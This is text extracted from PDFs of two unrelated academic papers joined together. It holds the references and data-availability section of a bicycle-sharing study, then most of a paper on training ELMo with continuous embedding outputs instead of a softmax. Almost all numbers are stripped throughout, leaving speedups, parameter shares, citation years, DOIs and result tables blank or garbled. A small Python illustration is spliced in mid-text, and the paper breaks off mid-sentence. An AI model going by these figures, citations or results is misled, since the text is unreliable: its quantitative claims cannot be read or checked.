work, authored or reviewed drafts of the paper, approved the final draft. • yang yang conceived and designed the experiments, performed the experiments, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • shihua wang analyzed the data, contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft. • yudi xu performed the experiments, prepared figures and/or tables, performed the computation work, approved the final draft. • hong ma analyzed the data, prepared figures and/or tables, performed the computation work, approved the final draft, research funding. • ritai yu performed the experiments, prepared figures and/or tables, approved the final draft. data availability the following information was supplied regarding data availability: the data is available at github: https://github.com/yanncuz/ .git. the new york public bicycle data are available in the citi bike trip histories repository: https://www.citibikenyc.com/system-data and http://datawrapper.dwcdn.net/rrehm/ /. the chicago public bicycle data are available in the divvy data repository: https: //www.divvybikes.com/system-data. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. lin et al. ( ), peerj comput. sci., doi . /peerj-cs. 
/ https://peerj.com https://github.com/yanncuz/ .git https://www.citibikenyc.com/system-data http://datawrapper.dwcdn.net/rrehm/ / https://www.divvybikes.com/system-data https://www.divvybikes.com/system-data http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. references basch ch, ethan d, zybert p, afzaal s, spillane m, basch ce. . public bicycle sharing in new york city: helmet use behaviour patterns at city bicycles stations. journal of community health ( ): – doi . /s - - -y. dubey pp, borkar p. . review on techniques for traffic jam detection and conges- tion avoidance. in: nd international conference on electronics and communica- tion systems (icecs)—review on techniques for traffic jam detection and congestion avoidance. piscataway: ieee, – . dziauddin mf, powe n, alvanides s. . estimating the effects of light rail transit (lrt) system on residential property values using geographically weighted regression (gwr). applied spatial analysis and policy ( ): – doi . /s - - -z. feng x, zhu fx, liu sc. . label propagation community discovery algorithm based on deepwalk model. computer engineering ( ): – . forma ia, raviv t, tzur m. . a -step math heuristic for the static repositioning problem in bicycle-sharing systems. transportation research part b ( ): – doi . /j.trb. . . . guo c, gong c, xu h, yao z. . queuing game theory based optimal routing scheme for heterogeneous users over space information networks. mathematical problems in engineering : article doi . / / . hartmann tolić i, martinović g, crnjac milić d. . optimization methods in modern transportation systems. tehnicki vjesnik—technical gazette ( ): – . hu x, an s, wang j. . taxi driver’s operation behavior and passengers’ demand analysis based on gps data. journal of advanced transportation : doi . / / . jiang s, guan w, he z, yang l. . exploring the intermodal relationship between taxi and subway in beijing, china. journal of advanced transportation : doi . / / . kim s, jeong ub, lee ky. . multi-objective optimization for mixed-flow pump with blade angle of impeller exit and diffuser inlet. journal of mechanical science and technology ( ): – doi . /s - - - . lin w, song y. . a comparative study on x-ray diffraction mineral quan- titative analysis of two methods in sediments. journal of earth environment ( ): – . long j, szeto wy, huang hj. . a bi-objective turning restriction design problem in urban road networks. european journal of operational research ( ): – doi . /j.ejor. . . . manju vn, fred al. . ac coefficient and k-means cuckoo optimisation algorithm- based segmentation and compression of compound images. iet image processing ( ): – doi . /iet-ipr. . . lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . /j.trb. . . http://dx.doi.org/ . / / http://dx.doi.org/ . / / http://dx.doi.org/ . / / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.ejor. . . http://dx.doi.org/ . /iet-ipr. . http://dx.doi.org/ . /peerj-cs. miranda-bront jj, curcio b, méndez-díaz i, montero a, pousa f, zabala p. . a cluster-first route-second approach for the swap body vehicle routing problem. annals of operations research ( ): – doi . /s - - - . mori t, saito s. . molecular mechanism behind the fast folding/unfolding transi- tions of villain headpiece subdomain: hierarchy and heterogeneity. journal of physical chemistry b : – . 
pan gq, jun-yi hu, min h. . gis-based logistics distribution area division and its vrp algorithm. journal of dalian maritime university ( ): – . phanikrishnakishore m, madamsetti ak. . attribute level clustering approach to quantitative association rule mining. international journal of computer applications ( ): – . schuijbroek j, hampshire rc, hoeve wjv. . inventory rebalancing and vehicle routing in bicycle sharing systems. european journal of operational research ( ): – . shivach p, nautiyal l, ram m. . applying multi-objective optimization al- gorithms to mechanical engineering. in: ram m, davim j, eds. soft computing techniques and applications in mechanical engineering. hershey: igi global, – doi . / - - - - .ch . shpak m, ni y, lu j, müller p. . variance in estimated pairwise genetic distance un- der high versus low coverage sequencing: the contribution of linkage disequilibrium. theoretical population biology : – . sun w, zhang l, du b. . band selection using improved sparse subspace clustering for hyperspectral imagery classification. ieee journal of selected topics in applied earth observations and remote sensing ( ): – doi . /jstars. . . sun z-y, li y, qu w-c, muhammad t. . unified framework for optimal routing choice under guidance information. complexity : doi . / / . tulabandhula t, bodas t. . method and system for dispatching of vehicles in a public transportation network. united states patent ( ): – . wu t. . research of logistics distribution path planning based on improved nsga-ii. journal of information & computational science ( ): – doi . /jics . xu jm, qin xr, ma yy. . public bicycle multilevel partition scheduling method. jiaotong yunshu xitong gongcheng yu xinxi/ journal of transportation systems engineering and information technology ( ): – . yanping j, decai k, duoning y. . two-sided stable matching decision-making method with ordinal interval preference. systems engineering—theory & practice ( ): – . ye p, chu c, xu l. . ic card-based data mining characteristics of urban public bicycles. in: fifth international conference on transportation engineering. – doi . / . . zhang j, liang y, wei wj. . regional division of public bicycle stations based on improved k-means algorithm. information communication ( ): – . lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / - - - - .ch http://dx.doi.org/ . /jstars. . http://dx.doi.org/ . / / http://dx.doi.org/ . /jics http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. zhang w, ge y, yuan b, xu h. . busy line analysis with improved association rules mining algorithm for hangzhou public free-bicycle system. in: intelligent systems. vol. . piscataway: ieee, – . zhen z, xiangqian li, dept s, univ sn. . development and enlightenment of public bicycle sport in chicago. journal of sports adult education ( ): – . lin et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. efficient contextual representation learning with continuous outputs liunian harold li†, patrick h. chen∗, cho-jui hsieh∗, kai-wei chang∗ †peking university ∗university of california, los angeles liliunian@pku.edu.cn, patrickchen@g.ucla.edu {chohsieh, kwchang}@cs.ucla.edu abstract contextual representation models have achieved great success in improving various downstream natural language processing tasks. however, these language-model-based encoders are dif- ficult to train due to their large parameter size and high computational complexity. 
by carefully examining the training procedure, we observe that the softmax layer, which pre- dicts a distribution of the target word, often in- duces significant overhead, especially when the vocabulary size is large. therefore, we re- visit the design of the output layer and consider directly predicting the pre-trained embedding of the target word for a given context. when applied to elmo, the proposed approach achieves a -fold speedup and eliminates % trainable parameters while achieving competitive per- formance on downstream tasks. further anal- ysis shows that the approach maintains the speed advantage under various settings, even when the sentence encoder is scaled up. introduction in recent years, text representation learning ap- proaches, such as elmo (peters et al., a), gpt (radford et al., ), bert (devlin et al., ), and gpt- (radford et al., ), have been developed to represent generic contextual information in natural languages by training an encoder with a language model objective on a large unlabelled corpus. during the training process, the encoder is given part of the text and asked to predict the missing pieces. prior studies show that the encoders trained in this way can capture generic contextual information of the input text and improve a variety of downstream tasks significantly. however, training contextual representations is known to be a resource-hungry process. for example, elmo is reported to take about weeks to train on a one-billion-token corpus with a vocabulary of , words using three gpus. this slow training procedure hinders the development cycle, prevents fine-grained param- eter tuning, and makes training contextual repre- sentations inaccessible to the broader community. recent work also raises concerns about the envi- ronmental implications of training such large models (strubell et al., ). in addition, the suc- cess of these models stems from a large amount of data they used. it is challenging, if not impossible, to train a contextual representation model on a larger corpus with tens or hundreds of billions of tokens. in this work, we explore how to accelerate contextual representation learning. we identify the softmax layer as the primary cause of inefficiency. this component takes up a considerable portion of all trainable parameters ( % for elmo) and consumes a huge amount of training time. however, it is often not needed in the final model as the goal of contextual representation learning is to build a generic encoder. therefore, it is rather a waste to allocate extensive computational resources to the softmax layer. inspired by kumar and tsvetkov ( ), we con- sider learning contextual representation models with continuous outputs. in the training process, the contextual encoder is learned by minimizing the distance between its output and a pre-trained target word embedding. the constant time com- plexity and small memory footprint of the output layer perfectly serve our desire to decouple learn- ing contexts and words and devote most com- putational resources to the contextual encoder. in addition, we combine the approach with open- vocabulary word embeddings such that the model can be trained without the need to pre-define a https://github.com/allenai/bilm-tf/ issues/ . transactions of the association for computational linguistics, vol. , pp. – , . https://doi.org/ . /tacl a action editor: luke zettlemoyer. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. 
downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://github.com/allenai/bilm-tf/issues/ https://github.com/allenai/bilm-tf/issues/ https://doi.org/ . /tacl_a_ closed word set as the vocabulary. we also provide an alternative interpretation of learning contextual encoders with continuous outputs that sheds light on how the pre-trained embedding could affect the performance of the model. we conduct a comprehensive empirical study to analyze the proposed approach and several existing methods that are originally proposed to reduce the complexity of the output layer in lan- guage models, such as the adaptive softmax, and the sub-word methods. we incorporate these ap- proaches with elmo and conduct a comprehen- sive study to compare them in terms of training speed and performance on five downstream tasks. we demonstrate that the proposed approach ef- fectively reduces the training time and trainable parameters while maintaining competitive perfor- mance compared with the baselines. our approach also exhibits consistent computational advanxtage under different conditions (e.g., with different vo- cabulary sizes, with different sentence encoders, and with different number of gpus). source code is available athttps://github. com/uclanlp/elmo-c. background and related work contextual representation we review contex- tual representation models from two aspects: how they are trained and how they are used in downstream tasks. cove (mccann et al., ) uses the source lan- guage encoder from a machine translation model as a contextual representation model. peters et al. ( a) advocate for the use of larger unlabelled corpora and proposes elmo, a forward and a back- ward lstm-based (hochreiter and schmidhuber, ) language model, whereas gpt (radford et al., ) and gpt- (radford et al., ) build a language model with the transformer (vaswani et al., ). bert (devlin et al., ) intro- duces the masked language model and provides deep bidirectional representation. there are two existing strategies for applying pre-trained contextual representations to down- stream tasks: ) feature-based and ) fine-tuning. in the feature-based approach, fixed features are extracted from the contextual encoder (e.g., elmo, cove) and inserted as an input into a task-specific model. in the fine-tuning approach, the contextual encoder is designed as a part of the network architecture for downstream tasks, and its parameters are fine-tuned with the down- stream task. bert is designed for the fine-tuning approach but it is also evaluated with the feature- based approach. gpt- is a scaled-up version of gpt and exhibits strong performance under zero-shot settings. speeding up language models training con- siderable efforts have been devoted to accelerat- ing the training process of language models. one line of research focuses on developing faster sequence encoder architectures such as cnn (kim et al., ; dauphin et al., ), qrnn (bradbury et al., ), sru (lei et al., ), and the transformer (vaswani et al., ). these architectures have been extensively used for learning language representations (radford et al., ; devlin et al., ; tang et al., ). another line of work focuses on the large- vocabulary issue, as a large and ever-growing vo- cabulary results in an intractable softmax layer. our work falls into the second line and we review existing solutions in detail. several studies for language modeling focus on directly reducing the complexity of the soft- max layer. 
following kumar and tsvetkov ( ), we group them into two categories: sampling- based approximations and structural approxima- tions. sampling-based approximations include the sampled softmax (bengio et al., ) and nce (mnih and teh, ). the sampled softmax ap- proximates the normalization term of softmax by sampling a subset of negative targets, and nce replaces the softmax with a binary classifier. on the other hand, structural approximations such as the hierarchical softmax (morin and bengio, ) and the adaptive softmax (grave et al., ), form a structural hierarchy to avoid expensive nor- malization. the adaptive softmax, in particular, groups words in the vocabulary into either a short- list or clusters of rare words. for frequent words, a softmax over the short-list would suffice, which reduces computation and memory usage signifi- cantly. the adaptive softmax has been shown to achieve results close to those of the full softmax while maintaining high gpu efficiency (merity et al., ). regarding contextual representation models, elmo used the sampled softmax and gpt and bert resorted to a subword method. specifi- cally, they used wordpiece (wu et al., ) or bpe (sennrich et al., ) to split the words into downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://github.com/uclanlp/elmo-c https://github.com/uclanlp/elmo-c subwords and the language models were trained to take subwords as input and also predict sub- words. this method is efficient and scalable, as the subword vocabulary can be kept small. one potential drawback of these subword-level lan- guage models, however, is that they produce rep- resentations for fragments of words. therefore, it takes extra effort to generate word-level repre- sentations (see the discussion in section . ). the high cost of the softmax layer has also been noted in the sentence representation learning literature. following the success of word vec (mikolov et al., ), methods such as skipthought (kiros et al., ) have been developed to learn distributed sentence representations by predicting the context sentences of a given sentence, which involves sequentially decoding words of the target sentences. jernite et al. ( ) and logeswaran and lee ( ) notice the inefficiency of the softmax layer during decoding and propose to use discriminative instead of generative objectives, eliminating the need for decoding. however, these approaches are not directly applicable to contex- tual representation learning. approach a contextual representation model, at its core, is a language model pre-trained on a large unlabeled corpus. in the following, we review the objective of language models and the architectures of exist- ing contextual representation models. we then introduce the proposed model. language model objective given a set of text sequences as the training corpus, we can construct a collection of word-context pairs (w, c), and the goal of a language model is to predict the word w based on the context c. in a forward language model, the context c is defined as the previous words in the sequence, whereas for a backward language model, the context of a word is defined as the following words. for a masked language model, some words in the input sentence are masked (e.g., replaced by a [mask] token) and the objective is to predict the masked words from the remainder. different contextual representa- tion models optimize different objectives. 
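As a plain-Python illustration (ours, not taken from any of the systems discussed) of how the word–context pairs (w, c) differ across these objectives:

```python
def forward_lm_pairs(tokens):
    # context = all preceding words; predict the next word
    return [(tokens[i], tokens[:i]) for i in range(1, len(tokens))]

def backward_lm_pairs(tokens):
    # context = all following words; predict the current word
    return [(tokens[i], tokens[i + 1:]) for i in range(len(tokens) - 1)]

def masked_lm_pairs(tokens, masked_positions):
    # context = the sentence with some positions replaced by a [MASK] token
    corrupted = [t if i not in masked_positions else "[MASK]" for i, t in enumerate(tokens)]
    return [(tokens[i], corrupted) for i in masked_positions]

sent = "the model predicts missing pieces".split()
print(forward_lm_pairs(sent)[2])      # ('predicts', ['the', 'model'])
print(masked_lm_pairs(sent, {1})[0])  # ('model', ['the', '[MASK]', 'predicts', 'missing', 'pieces'])
```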
for example, elmo trains a forward and backward language model and bert trains a masked- language model. model architecture a typical neural language model consists of three parts: ) an input layer, ) a sequence encoder, and ) a softmax layer. given a word-context pair (w, c), the input layer uses a word embedding or a character-cnn model (kim et al., ) to convert the input words in c into word vectors. then the sequence encoder embeds the context into a context vector c ∈ rm using a multi-layer lstm (hochreiter and schmidhuber, ), a gated cnn (dauphin et al., ), or a transformer (vaswani et al., ). the softmax layer then multiplies the context vector c with an output word embedding w ∈ rv ×m and uses a softmax function to produce a conditional distribution p(w|c) over the vocabulary of size v . in a language model, the learning objective l(w, c) for (w, c) is then expressed as: l(w, c) = − log p(w|c) = − log softmax(cw t ) = −c · w + log ∑ w′ exp(c · w′), ( ) where w ∈ rm is a row from w corresponding to the target word w and the second term sums over the vocabulary. after the model is trained, the contextual representations are generated from the latent states of the sequence encoder. for example, elmo combines the hidden states of the lstms to generate contextualized word embedding for each word in a sentence. we refer the reader to peters et al. ( a) for details. note that the size of w and the computational complexity of the second term in eq. ( ) scale linearly to the vocabulary size, v . therefore, when v is large, the softmax layer becomes the speed bottleneck. our approach the scaling issue of softmax also occurs in other language generation and sequence- to-sequence models. in the literature, several ap- proaches have been proposed to approximate the softmax layer or bypass it with a subword method (see section ). recently, kumar and tsvetkov ( ) propose to treat the context vector as con- tinuous outputs and directly minimize the distance the dimension of the original output from the sequence encoder may not match the dimension of the output word embedding. in that case, a projection layer is added after the original sequence encoder to ensure that the two dimensions match. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april between the context vector and the pre-trained word embedding associated with the target word, l(w, c) = d(c, w) ( ) the distance function l could be the l distance ‖c − w‖ , the cosine distance c·w ‖c‖‖w‖ or a prob- abilistic distance metric. we argue that the idea of learning with con- tinuous outputs particularly suits contextual rep- resentation learning. as the goal is to obtain a strong contextual encoder, it makes sense to use a pre-trained output word embedding and decouple learning the contextual encoder and the output embedding. in the remainder of this section, we discuss the computational efficiency of the pro- posed approach and its combination with the open- vocabulary word embedding. we also provide an alternative way to interpret training contextual en- coders with continuous outputs. . computational efficiency the continuous output layer has a reduced arith- metic complexity and trainable parameter size. we illustrate these improvements and how they contribute to reducing the overall training time of a contextual representation model in the following. for comparison, we include the sampled softmax, the adaptive softmax, and the subword method in the discussion. . . 
learning with continue outputs arithmetic complexity the arithmetic com- plexity (i.e., flops) of evaluating loss with con- tinue outputs (i.e., eq. ) takes o(m), as we only need to calculate the distance between two m-dimensional vectors. the complexity of the sampled softmax is proportional to the number of negative samples per batch. when the vocabulary is huge, a large number of negative samples are needed (jozefowicz et al., ). for the adaptive softmax, the time complexity is determined by the capacities of the short-list and the rare-word clus- ters, which grows sub-linearly to the vocabulary size. the complexity of the subword method is determined by the subword vocabulary size. in contrast, the time spent on the continuous output layer and loss evaluation remains constant with respect to the vocabulary size and is negligible. trainable parameter size the output word embedding usually takes up a huge part of the parameters of a language model. for example, the softmax layer in elmo trained on the one billion word benchmark (chelba et al., ) takes up more than % of the trainable parameters of the entire model. even if an approximation such as the sampled softmax is used, the number of trainable parameters is not reduced. approaches like the adaptive softmax reduce the dimension of softmax embedding for rare words, the trainable parameter size of which is effectively reduced but still remains sizable. for a model trained on the same corpus (grave et al., ), the adaptive softmax still amounts to million parameters whereas the sequence encoder has only around million parameters. on the contrary, we learn a contextual encoder with eq. ( ) using a pre- trained word embedding, reducing the trainable parameters besides the encoder from tens or hun- dreds of millions to zero. . . overall training time we now discuss how the efficiency improvements to the output layer contribute to the reduction of the overall training time, in the context of synchronous stochastic gradient descent training on multiple gpus. in general, the following three factors determine the training time. arithmetic complexity the arithmetic com- plexity of a model includes the complexity of the forward and backward propagation on the in- put layer, the sequence encoder, and the output layer. it also includes the overhead of the opti- mization algorithm such as gradient clipping and model updates. the complexity of this optimiza- tion overhead is often proportional to the number of parameters that need updating. with the con- tinuous output layer, not only the arithmetic com- plexity but also the optimization overhead are reduced. gpu memory consumption the training time is also affected by gpu memory consumption, as less gpu memory consumption leads to larger batch size. for the same amount of data and hard- ware resource, larger batch size means better parallelism and less training time. our approach exhibits small gpu memory footprints, due to reductions of the arithmetic complexity (with fewer intermediate results to keep) and trainable parameter size (with fewer parameters to store). as a result, training with continuous outputs is to times more memory-efficient than with the softmax layer (see section . ). downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april note that as the output word embedding is fixed, we can keep that embedding in the main memory and only load the required part to the gpu memory. 
despite the fact that this comes with an overhead of moving part of the output word embedding from cpu to gpu memory at each iteration, the benefit of parallelism often dominates over the communication overhead on mainstream hardware, where the gpu memory is often comparatively limited. we also note that larger batch size may lead to difficulty in opti- mization. several methods have been developed to ease the large-batch training issue (goyal et al., ; you et al., ). we show that these meth- ods are sufficient for resolving the optimization difficulty in our experiment (section ). communication cost to train large neural net- work models, using multiple gpus almost becomes a necessity. in addition, one way to scale up current systems is to increase the number of gpus used. in such cases, the communication cost across gpus needs to be taken into consideration. the cost occurs from synchronizing the parameters and their gradients across gpus, which is proportional to the size of parameters that need to be updated. for the sampled softmax, due to the use of the sparse gradient, the communication cost is pro- portional to the number of the sampled words. for the adaptive softmax and the subword language model, the communication cost is proportional to the trainable parameter size. the continuous output layer, on the other hand, incurs little com- munication cost across gpus. . open-vocabulary training we utilize the open-vocabulary word embedding as both the input and output layer embedding. open- vocabulary word embeddings, such as the fasttext embedding and the mimick model (pinter et al., ), utilize character or subword information to provide word embeddings. they could represent an unlimited number of words with a fixed number of parameters. as a result, we can train contextual encoders with an open vocabulary, which means we do not need to pre-define a closed word set as the vocabulary and the model can be trained on any sequences of words. open-vocabulary input layer to be easily ap- plied in various tasks, the contextual encoder usu- ally has an open-vocabulary input layer. elmo uses a character-cnn but it is relatively slow. thus we use a pre-trained open-vocabulary word embedding as the input layer of the contextual encoder, reducing the time complexity of the input layer to a negligible level. this also aligns with the main spirit of our approach, which is to spend computational resources on the most important part, the sequence encoder. open-vocabulary output layer for the soft- max layer, including efficient variants such as the adaptive softmax, the output vocabulary has to be pre-defined so that the normalization term can be calculated. as the softmax layer’s arithmetic complexity and parameter size grow when the vo- cabulary size grows, the vocabulary is often trun- cated to avoid expensive computation. with the continuous output layer, we can con- duct training on an arbitrary sequence of words, as long as the output embedding for those words can be derived. this can be achieved by using the open-vocabulary embedding. this feature is espe- cially attractive if we are training on domains or languages with a long-tail word distribution such as the biomedical domain, where truncating the vocabulary may not be acceptable. . interpretation of learning contextual encoders with continuous outputs in the following, we justify the intuition behind learning with continue outputs and discuss how the pre-trained word embedding affects the per- formance of the model. 
language models are essentially modeling the word-context conditional probability matrix, that is, a ∈ rn×v where ac,w = p(w|c), n is the number of all possible contexts, and v is the vocabulary size (levy and goldberg, ; yang et al., ). the continuous output layer can be viewed as modeling a after using the word embedding as a projection matrix. to illustrate this, consider the global objective of the layer with the cosine distance: l = ∑ (w,c) #(w, c)l(w, c) = − ∑ (w,c) #(w, c)c · w = − ∑ c #(c)c· ∑ w p(w|c)w, = − ∑ c #(c)c· ∑ w ac,ww, for simplicity, we take the cosine distance as a running example but the conclusions hold for other distance functions. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april model input sequence encoder output elmo cnn lstm sampled softmax elmo-c (ours) fasttextcc lstm w/ ln cont w/ fasttextcc elmo-a fasttextcc lstm w/ ln adaptive softmax elmo-sub subword lstm w/ ln softmax elmo-coneb fasttextoneb lstm w/ ln cont w/ fasttextoneb elmo-crnd fasttextcc lstm w/ ln cont w/ random embedding elmo-ccnn trained cnn lstm w/ ln cont w/ trained cnn elmo-ccnn-cc trained cnn lstm w/ ln cont w/ fasttextcc elmo-ccc-cnn fasttextcc lstm w/ ln cont w/ trained cnn table : specifications of variants of elmo models compared in sections and . cont means the model has continuous outputs. ln means layer normalization. where #(w, c) is the number of occurrences of the pair (w, c) in the corpus. we assume all vectors (c and w) are normalized. to optimize the inner product between c and∑ w p(w|c)w, we essentially align the direction of context vector c with the expected word vector under context c, ∑ w p(w|c)w = ew∼p(w|c)w. in other words, given a word embedding matrix w ∈ rv ×d, our approach aligns c with the cor- responding row (aw )c,: in aw . therefore, the ob- jective can be viewed as conducting multivariate regression to approximate (aw )c,: given the context. based on this view, the performance of the contextual representation model depends on how much information of the original matrix a is preserved after projection with w . in the spirit of pca (jolliffe, ), to keep the variance of a, we would like to have (aw )c,: and (aw )c′,: distant from each other if c and c′ are very different. therefore, a pre-trained word embedding, which projects words with different meanings into different positions in space, is a natural choice for the projection matrix w and can help preserve much of the variance of a. experiment we accelerate elmo with the proposed approach and show that the resulting model elmo-c is computationally efficient and maintains competi- tive performance, compared to the original elmo model (elmo), an elmo variant with the adap- tive softmax (elmo-a ), and another variant with the subword method (elmo-sub). we include elmo-a instead of a model with sampled softmax because the adaptive softmax has been shown to have superior performance (grave et al., ). . setup models in the following, we introduce the mod- els in detail. table provides a summary. the original elmo consists of a character-cnn as the input layer, a forward and backward lstm with projection as the sequence encoder, and a sampled softmax as the output layer. adagrad (duchi et al., ) is used as the optimizer. we conduct experiments using the reimplementation of elmo in allennlp (gardner et al., ) and build the others upon it. 
the key difference between elmo-c and elmo is that elmo-c produces continuous outputs and we train it with the cosine distance loss. a fasttext embedding trained on common crawl (mikolov et al., ) (fasttextcc) is used as the output embedding. based on preliminary experiments, we also make three minor changes: ) we use fasttextcc as the input layer as it is more efficient than the character-cnn model; ) we add a layer norm (ba et al., ) after the projection layer of the lstm to improve the convergence speed; ) we use adam with the learning rate schedule from chen et al. ( ) to help training with a large batch size. our main goal is to study how different output layers affect the training speed and performance, which cannot be achieved by just comparing elmo-c and elmo, due to the aforementioned minor changes to elmo-c. therefore, we intro- duce two additional baseline models (elmo-a and elmo-sub), which differ from elmo-c in a minimal way. specifically, their sequence en- coders and training recipes are kept the same as elmo-c. thus elmo-c, elmo-a, and elmo-sub can be directly compared. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april elmoorg base fasttextcc elmo elmo-a elmo-sub elmo-c time − − − x . x . x . x batch − − − params − − − m m m m snli . . . . . . . coref na na . . . . . sst- . . . ± . . ± . . ± . . ± . . ± . ner . . . ± . . ± . . ± . . ± . . ± . srl . . . . . . . table : computational efficiency of the main competing models and their performance on five nlp benchmarks. time is the overall training time in days x cards format. batch is the maximal batch size per card. params is the number of trainable parameters in millions. due to the small test sizes for ner and sst- , we report mean and standard deviation across three runs. our approach (elmo-c) exhibits better computational efficiency and shows comparable performance compared with elmo, elmo-a, and elmo-sub. elmo-a uses the adaptive softmax as its output layer. we carefully choose the hyper-parameters of the adaptive softmax to obtain an efficient yet strong baseline. it has only half of the parameters of the one reported in grave et al. ( ) but achieves a perplexity of . , lower than elmo’s . . elmo-sub takes subwords as input and also predicts subwords. thus, unlike other models, its vocabulary consists of around , subwords created using bpe (sennrich et al., ). for this reason, a lookup-table-style embedding rather than fasttextcc is used as its input layer and a vanilla softmax is used as its output layer. its input and output word embedding are tied and trained from scratch. for reference, we also list the results of elmo and the baseline reported in peters et al. ( a) as elmoorg and base. however, these models are evaluated using different configurations. finally, we also include fasttextcc a (non-contextual) word embedding model, as another baseline. all contextual representation models are trained on the one billion word benchmark for epochs and the experiments are conducted on a workstation with geforce gtx ti gpus, intel xeon e cpus, and g main memory. downstream benchmarks we follow peters et al. ( a) and use the feature-based approach to evaluate contextual representations on down- stream benchmarks. elmo was evaluated on six benchmarks and we conduct evaluations on five of them. squad (rajpurkar et al., ) is not available for implementation reasons. in the following, we briefly review the benchmarks and task-specific models. 
for details please refer to peters et al. ( a). • snli (bowman et al., ): the textual entailment task seeks to determine whether a ‘‘hypothesis’’ can be entailed from a ‘‘premise’’. the task-specific model is esim (chen et al., ). • coref: coreference resolution is the task of clustering mentions in text that refer to the same underlying entities. the data set is from conll shared task (pradhan et al., ) and the model is from lee et al. ( ). note that we use an improved version of the coref system (lee et al., ) used in peters et al. ( a). • sst- (socher et al., ): the task in- volves selecting one of five labels to describe a sentence from a movie review. we use the bcn model from mccann et al. ( ). • ner: the conll ner task (sang and de meulder, ) consists of newswire from the reuters rcv corpus tagged with four different entity types. the model is a bilstm-crf from peters et al. ( a), similar to collobert et al. ( ). • srl: semantic role labeling models the predicate-argument structure of a sentence. it the squad experiment in peters et al. ( a) was conducted with an implementation in tensorflow. the experiment setting is not currently available in allennlp (https://github.com/allenai/allennlp/ pull/ ), nor can it be easily replicated in pytorch. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://github.com/allenai/allennlp/pull/ https://github.com/allenai/allennlp/pull/ seeks to answer ‘‘who did what to whom’’. the model is from he et al. ( ) and the data set is from pradhan et al. ( ). for snli, sst- , ner, and srl, we use the same downstream models as in peters et al. ( a) re-implemented in allennlp. for coref, peters et al. ( a) uses the model from lee et al. ( ) and we use an improved model (lee et al., ) from the same authors. for all the tasks, the hyper-parameters are tuned to maximize the performance for the original elmo and all models are tested under the same configurations. . main results we report the main results in table . our ap- proach (elmo-c) enjoys a substantial compu- tational advantage while maintaining competitive or even superior performance, compared to elmo, elmo-a, and elmo-sub. model efficiency for model efficiency, the statistics of elmo is reported by the original authors and they use three gtx tis. we train elmo-a, elmo-sub, and elmo-c using four gtx tis. roughly speaking, compared with elmo, elmo-c is . x faster and x more memory-efficient. to give a clear view of the speedup the cont layer brings, we compare elmo-c with elmo-a. elmo-a differs from elmo-c only in the output layer. still, elmo- c has a . x speed advantage and is x more memory-efficient. compared with elmo-sub, our approach holds a . x speed advantage and is x more memory-efficient. the results here only show the overall efficiency of our approach under the setting of elmo and a detailed analysis of the efficiency is desirable, which we provide in section . . performance on downstream tasks elmo-c works especially well on semantic-centric tasks, such as snli, coref, and sst- . however, for tasks that required a certain level of syntactic information, such as ner and srl (he et al., ), elmo-c suffers from slight performance degradation compared with elmo, but it remains competitive with elmo-a and elmo-sub. we suspect that the performance degradation is related to the pre-trained embedding and conduct further analysis in section . . 
for srl, the score reported by allennlp is lower than the score reported by conll official script. in addition, we notice that the performance of elmo-sub is unstable. it shows satisfying per- formance on sst- , ner, and srl. however, it lags behind on coref and even fails to outper- form fasttextcc on snli. elmo-sub provides subword-level contextual representations, which we suspect could be the cause of unstable perfor- mance. specifically, to get the representation for a word in evaluation on word-level tasks, we follow devlin et al. ( ) to use the representation of its first subword. this could be sub-optimal if precise word-level representation is desired (e.g., the suf- fix of a word is an important feature). these results are consistent with the observation in kitaev and klein ( ). they find that special design has to be made to apply bert to constituency parsing because of the subword segmentation. however, we notice that the scope of our experiment is lim- ited. it is likely that when elmo-sub is scaled up or used with the fine-tuning method, the afore- mentioned issue is alleviated—we leave that to future work. analysis we conduct analysis regarding the effect of the pre-trained word embedding on the performance of the contextual encoder. we also investigate the contributions of different factors to the overall training time and study the speedup of our ap- proach under various conditions. . effect of the pre-trained embedding we show the effect of the pre-trained embedding by introducing several variants of elmo-c (sum- marized in table ) and list their performance in table . quality of the pre-trained embedding we aim to understand how the quality of the pre- trained output word embedding w affects the performance of the contextual encoder. to study this, we train a fasttext word embedding on the one billion word benchmark, a much smaller corpus than common crawl. we then train an elmo-c variant, elmo-coneb , by using this em- bedding in the input and output layers. com- paring it to elmo-c, elmo-coneb holds up surprisingly well and it is competitive on snli, coref, and sst- while being inferior on ner and srl. this motivates us to take a step further and use a completely random output word embedding. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april task elmo-c elmo-coneb elmo-crnd elmo-ccnn elmo-ccnn-cc elmo-ccc-cnn snli . . . . . . coref . . . . . . sst- . ± . . ± . . ± . . ± . . ± . . ± . ner . ± . . ± . . ± . . ± . . ± . . ± . srl . . . . . . table : performance of ablation models on five nlp benchmarks. elmo-c is included for reference. we replace the output embedding of elmo-c with a random embedding matrix, of which each element is randomly drawn from a standard normal distribution. we denote this model as elmo-crnd. we find that this model performs well (table ), with only a mild performance drop compared to elmo-c. the performance of elmo-crnd shows the robustness of the proposed approach and demonstrates that the deep lstm is expressive enough to fit a complex output space. however, we 